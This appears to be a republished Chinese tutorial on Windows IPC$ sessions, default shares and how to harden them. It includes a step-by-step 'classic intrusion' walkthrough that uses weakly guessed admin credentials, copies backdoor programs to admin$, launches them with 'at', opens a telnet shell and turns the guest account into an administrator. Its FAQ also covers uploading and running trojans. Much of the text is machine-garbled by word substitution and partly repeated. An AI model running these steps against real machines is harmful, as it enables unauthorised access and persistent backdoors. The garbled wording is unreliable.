DOS 常用命令&IPC$命令详解

  1)ipc$与空连接:
  不必要用户名与暗码的ipc$连接即为空连接,一旦你以某个用户或办理员的身份登岸(即以特定的用户名和暗码举行ipc$连接),自然就不能叫做空连接了.
  许多人大概要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,缘故原由后面提到过,当你以空连接登岸时,你没有任何权限(很忧郁吧),而你以用户或办理员的身份登岸时,你就会有相应的权限(有权限谁不想呀,所以还是老诚实实扫吧,不要偷懒哟).
  2)ipc$与139,445端口:
  ipc$连接可以实现远程登岸及对默许共享的拜访;而139端口的开启表示netbios协议的使用,我们可以通过139,445(win2000)端话柄现对共享文件/打印机的拜访,因而一样平常来讲,ipc$连接是必要139或445端口来支持的.
  3)ipc$与默许共享
  默许共享是为了方便办理员远程办理而默许开启的共享(你当然可以关闭它),即全部的逻辑盘(c$,d$,e$……)和体系目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默许共享的拜访(条件是对方没有关闭这些默许共享)
  五 ipc$连接失败的缘故原由
  以下5个缘故原由是比较常见的:
  1)你的体系不是NT或以上民主作体系;
  2)对方没有打开ipc$默许共享
  3)对方未开启139或445端口(惑被防火墙屏蔽)
  4)你的命令输入有误(比如缺少了空格等)
  5)用户名或暗码错误(空连接当然无所谓了)
  另外,你也可以凭据返回的错误号分析缘故原由： 
  错误号5，拒绝拜访 ： 很大概你利用的用户不是办理员权限的，先提拔权限； 
  错误号51，Windows 无法找到网络路径 : 网络有问题； 
  错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver办事未启动；目标有防火墙（端口过滤）； 
  错误号67，找不到网络名 ： 你的lanmanworkstation办事未启动；目标删除了ipc$； 
  错误号1219，提供的凭据与已存在的凭据集辩论 ： 你曾经和对方创建了一个ipc$，请删除再连。 
  错误号1326，未知的用户名或错误暗码 ： 缘故原由很显着了； 
  错误号1792，试图登录，但是网络登录办事没有启动 ： 目标NetLogon办事未启动。（连接域控会出现此情况） 
  错误号2242，此用户的暗码曾经过期 ： 目标有帐号策略，强制定期要求更改暗码。 
  关于ipc$连不上的问题比较庞大，除了以上的缘故原由,还会有其他一些不确定因素,在此自己无法细致而确定的说明,就*各人自己领会和试验了.
 
六  怎样打开目标的IPC$(此段引自相关文章) 
  首先你必要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以利用shell实行命令 net share ipc$ 来开放目标的ipc$。从上面可以晓得，ipc$能否利用还有许多条件。请确认相关办事都已运转，没有就启动它（不晓得怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）发起放弃。 
  七  怎样防范ipc$入侵
  1克制空连接举行枚举(此民主作并不能制止空连接的创建,引自《剖解win2000下的空会话》)
  首先运转regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(要是设置为2的话,有一些问题会产生,比如一些WIN的办事出现问题等等)
  2克制默许共享
  1）观察本地共享资源
  运转-cmd-输入net share
  2）删除共享(每次输入一个）
  net share ipc$ /delete
  net share admin$ /delete
  net share c$ /delete
  net share d$ /delete（要是有e,f,……可以连续删除）
  3）制止server办事
  net stop server /y （重新启动后server办事会重新开启）
  4）修正注册表
  运转-regedit
  server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。 
  pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。 
  要是上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。 
  3永久关闭ipc$和默许共享依赖的办事:lanmanserver即server办事
  控制面板-办理东西-办事-找到server办事（右击）-属性-常规-启动范例-已禁用
  4安置防火墙(选中相关设置)，大概端口过滤(滤失139,445等),大概用新版本的优化大家
  5设置庞大暗码，防止通过ipc$穷举暗码
  八 相关命令
  1)创建空连接:
  net use \\IP\ipc$ "" /user:""        (肯定要细致:这一行命令中包罗了3个空格) 
  2)创建非空连接:
  net use \\IP\ipc$ "用户名" /user:"暗码"     (异样有3个空格)
  3)映射默许共享:
  net use z: \\IP\c$ "暗码" /user:"用户名"       (即可将对方的c盘映射为自己的z盘，其他盘类推)
  要是曾经和目标创建了ipc$，则可以间接用IP+盘符+$拜访,详细命令 net use z: \\IP\c$
  4)删除一个ipc$连接
  net&nbs
  p;use \\IP\ipc$ /del 
  5)删除共享映射
  net use c: /del 删除映射的c盘，其他盘类推 
  net use * /del 删除全部,会有提示要求按y确认
  九 经典入侵模式
  这个入侵模式太经典了,大部分ipc教程都有先容,我也就拿过去援用了,在此感谢原创作者!(不晓得是哪位先辈) 
  11. C:\>net use \\127.0.0.1\IPC$ "暗码" /user:"用户名" 
  一样平常用流光，通过扫描弱口令来失掉，办理员帐号和暗码.
  2. C:\>copy srv.exe \\127.0.0.1\admin$ 
  先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，各人还可以利用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。
  3. C:\>net time \\127.0.0.1 
  查查工夫，发现127.0.0.1 的以后工夫是 2004/6/15 上午 11:00，命令成功完成。
  4. C:\>at \\127.0.0.1 11:05 srv.exe 
  用at命令启动srv.exe吧
  5. C:\>net time \\127.0.0.1
  再查查到工夫没有？要是127.0.0.1 的以后工夫是 2004/6/15 上午 11:05，那就准备开始下面的命令。
  6. C:\>telnet 127.0.0.1 99 
  这里会用到Telnet命令吧，细致端口是99。Telnet默许的是23端口，但是我们利用的是SRV在对方盘算机中为我们创建一个99端口的Shell。
  固然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们计划创建一个Telnet办事！这就要用到ntlm了
  7.C:\>copy ntlm.exe \\127.0.0.1\admin$
  用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
  8. C:\WINNT\system32>ntlm 
  输入ntlm启动（这里的C:\WINNT\system32>指的是对方盘算机，运转ntlm实在是让这个程序在对方盘算机上运转）。当出现"DONE"的工夫，就说明曾经启动正常。然后利用"net start telnet"来开启Telnet办事！ 
  9. Telnet 127.0.0.1，接着输入用户名与暗码就进入对方了，民主作就像在DOS上民主作一样简略！(然后你想做什么?想做什么就做什么吧,哈哈)
  为了以防万一,我们再把guest激活加到办理组    
  10. C:\>net user guest /active:yes 
  将对方的Guest用户激活
  11. C:\>net user guest 1234 
  将Guest的暗码改为1234,大概你要设定的暗码
  12. C:\>net localgroup administrators guest /add 
  将Guest变为Administrator(要是办理员暗码更改，guest帐号没改变的话，下次我们可以用guest再次拜访这台盘算机)
  ipc$常见问题:
  1，怎样创建空连接，它有什么用？ 
  答：利用命令 net use \IPipc$ "" /user:"" 就可以简略地和目标创建一个空连接（必要目标开放ipc$）。 
  对于NT，在默许安全设置下，借助空连接可以列举目标用户、共享，拜访everyone权限的共享，拜访小部分注册表等，没有什么利用代价。对2000作用就更小了。而且实现也不方便，需借助东西。
  2.为什么我连不上IPC$？ 
  答：1.只要nt/2000/xp及以上体系才可以创建ipc$。要是你用的是98/me是没有该功能的。 
  2.确认你的命令没有打错。精确的命令是： net use \目标IPipc$ "暗码" /user:"用户名" 
  细致别多了或少了空格。当用户名和暗码中不包罗空格时双方的双引号可以省略。空暗码用""表示。 
  3，凭据返回的错误号分析缘故原由： 
  错误号5，拒绝拜访 ： 很大概你利用的用户不是办理员权限的，先提拔权限； 
  错误号51，Windows 无法找到网络路径 : 网络有问题； 
  错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver办事未启动；目标有防火墙（端口过滤）； 
  错误号67，找不到网络名 ： 你的lanmanworkstation办事未启动；目标删除了ipc$； 
  错误号1219，提供的凭据与已存在的凭据集辩论 ： 你曾经和对方创建了一个ipc$，请删除再连。 
  错误号1326，未知的用户名或错误暗码 ： 缘故原由很显着了； 
  错误号1792，试图登录，但是网络登录办事没有启动 ： 目标NetLogon办事未启动。（连接域控会出现此情况） 
  错误号2242，此用户的暗码曾经过期 ： 目标有帐号策略，强制定期要求更改暗码。 
  4，关于ipc$连不上的问题比较庞大，没有总结出一个统一的认识，在肉鸡上实验偶然会得出抵牾的结论，十分顺手。 而且晓得了问题地点，要是没有用其他措施获得shell，许多问题仍然不能解决。
  5，怎样打开目标的IPC$？ 
  答：首先你必要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马。当然，这shell必须是admin权限的。然后你可以利用shell实行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以晓得，ipc$能否利用还有许多条件。请确认相关办事都已运转，没有就启动它（不晓得怎么做的请看net命令的用法）。还是不行的话（比如有防火墙，杀不了）发起放弃。 
  6，怎样映射和拜访默许共享？ 
  答：利用命令 net use z: \目标IPc$ "暗码" /user:"用户名" 将对方的c盘映射为自己的z盘，其他盘类推。 
  要是曾经和目标创建了ipc$，则可以间接用IP加盘符加$拜访。比如 copy muma.exe \IPd$pathmuma.exe 。大概再映射也可以，只是不用用户名和暗码了：net use y: \IPd$ 。然后 copy muma.exe y:pathmuma.exe 。当路径中包罗空格时，须用""将路径全引住。 
  7，怎样删除映射和ipc$连接？ 
  答：用命令 net use \IPipc$ /del 删除和一个目标的ipc$连接。 
  用命令 net use z: /
  del 删除映射的z盘，其他盘类推。 
  用命令 net use * /del 删除全部。会有提示要求按y确认。
  8，连上ipc$然后我能做什么？ 
  答：能利用办理员权限的帐号成功和目标连接ipc$，表示你可以和对方体系做深入“交换”了。你可以利用种种命令行方式的东西（比如pstools系列、Win2000SrvReskit、telnethack等）获得目标信息、办理目标的进程和办事等。要是目标开放了默许共享（没开你就帮他开），你就可以上传木马并运转。也可以用tftp、ftp的措施上传。像dwrcc、VNC、RemoteAdmin等东西（木马）还具有间接控屏的功能。要是是2000server，还可以考虑开启终端办事方便控制。这里提到的东西的利用，请看自带的说明或相关教程。
  9，怎样防止别人用ips$和默许共享入侵我？ 
  答：A、一种措施是把ipc$和默许共享都删除了。但重起后还会有。这就必要改注册表。 
  1，先把已有的删除 
  net share ipc$ /del 
  net share admin$ /del 
  net share c$ /del 
  …………（有几个删几个） 
  2，克制别人空连接 
  首先运转regedit，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA]把RestrictAnonymous（DWORD）的键值改为：00000002。 
  3，克制主动打开默许共享 
  对于server版，找到如下主键[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareServer（DWORD）的键值改为:00000000。 
  对于pro版，则是[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters]把AutoShareWks（DWORD）的键值改为:00000000。 
  要是上面所说的主键不存在，就新建一个再改键值。 
  B、另一种是关闭ipc$和默许共享依赖的办事（不保举） 
  net stop lanmanserver 
  大概会有提示说，XXX办事也会关闭能否连续。因为还有些次要的办事依赖于lanmanserver。一样平常情况按y连续就可以了。 
  C、最简略的措施是设置庞大暗码，防止通过ipc$穷举暗码。但要是你有其他毛病，ipc$将为进一步入侵提供方便。 
  D、还有一个措施就是装防火墙，大概端口过滤。
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:

评论加载中... 内容： 评论者： 验证码：